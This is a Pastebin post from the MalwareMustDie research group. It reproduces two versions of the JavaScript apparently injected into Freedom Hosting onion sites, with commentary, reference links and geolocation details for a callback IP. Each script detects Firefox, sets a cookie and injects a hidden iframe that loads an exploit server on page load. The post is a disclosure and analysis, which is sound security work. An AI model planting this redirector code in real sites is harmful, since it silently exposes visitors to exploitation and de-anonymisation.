Googleinurl

Freedom Hosting FBI IFRAME Redirector Malware Script

Jan 15th, 2015
1,059
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!
  2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
  3. # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. // Case 1
  17.  
  18.     function createCookie(name,value,minutes) {
  19.             if (minutes) {
  20.                     var date = new Date();
  21.                     date.setTime(date.getTime()+(minutes*60*1000));
  22.                     var expires = "; expires="+date.toGMTString();
  23.             }
  24.             else var expires = "";
  25.             document.cookie = name+"="+value+expires+"; path=/";
  26.     }
  27.      
  28.     function readCookie(name) {
  29.         var nameEQ = name + "=";
  30.         var ca = document.cookie.split(';');
  31.         for(var i=0;i < ca.length;i++) {
  32.             var c = ca[i];
  33.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
  34.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  35.         }
  36.         return null;
  37.     }
  38.      
  39.     function isFF() {
  40.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  41.     }
  42.      
  43.     function updatify() {
  44.         var iframe = document.createElement('iframe');
  45.         iframe.style.display = "inline";
  46.         iframe.frameBorder = "0";
  47.         iframe.scrolling = "no";
  48.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  49.         iframe.height = "5";
  50.         iframe.width = "*";
  51.         document.body.appendChild(iframe);
  52.     }
  53.      
  54.     function format_quick() {
  55.         if ( ! readCookie("n_serv") ) {
  56.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  57.             updatify();
  58.         }
  59.     }
  60.      
  61.     function isReady()
  62.     {
  63.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  64.      
  65.             if ( isFF() ) {
  66.                 format_quick();
  67.             }
  68.         }
  69.         else
  70.         {
  71.             setTimeout(isReady, 250);
  72.         }
  73.     }
  74.     setTimeout(isReady, 250);
  75.  
  76.  
  77. // Case 2
  78.  
  79. function createCookie(name, value, minutes) {
  80.     if (minutes) {
  81.         var date = new Date();
  82.         date.setTime(date.getTime() + (minutes * 60 * 1000));
  83.         var expires = "; expires=" + date.toGMTString();
  84.     } else var expires = "";
  85.     document.cookie = name + "=" + value + expires + "; path=/";
  86. }
  87.  
  88. function readCookie(name) {
  89.     var nameEQ = name + "=";
  90.     var ca = document.cookie.split(';');
  91.     for (var i = 0; i < ca.length; i++) {
  92.         var c = ca[i];
  93.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  94.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  95.     }
  96.     return null;
  97. }
  98.  
  99. function isFF() {
  100.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  101. }
  102.  
  103. function updatify() {
  104.     var iframe = document.createElement('iframe');
  105.     iframe.style.display = "inline";
  106.     iframe.frameBorder = "0";
  107.     iframe.scrolling = "no";
  108.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
  109.     iframe.height = "5";
  110.     iframe.width = "*";
  111.     document.body.appendChild(iframe);
  112. }
  113.  
  114. function freedomhost() {
  115.     if (!readCookie("n_serv")) {
  116.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
  117.         updatify();
  118.     }
  119. }
  120.  
  121. function isReady() {
  122.     if (document.readyState === "interactive" || document.readyState === "complete") {
  123.         if (isFF()) {
  124.             //window.alert(window.location + "Firefox Detected.")
  125.             freedomhost();
  126.         }
  127.     } else {
  128.         setTimeout(isReady, 250);
  129.     }
  130. }
  131. setTimeout(isReady, 250);
  132.  
  133. // Noted, same method,
  134. // second script is w/IP info callback, contacting remote host as per marked (1)
  135.  
  136.   IP Address: 65.222.202.53
  137.   City: Triadelphia
  138.   State or Region: West Virginia
  139.   Country: United States
  140.   ISP: Verizon Business
  141.   Latitude & Longitude: 40.0900-80.6220
  142.   Domain: verizonbusiness.com
  143.   ZIP Code: 26059
  144.  
  145. ---
  146. #MalwareMustDie! @unixfreaxjp
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×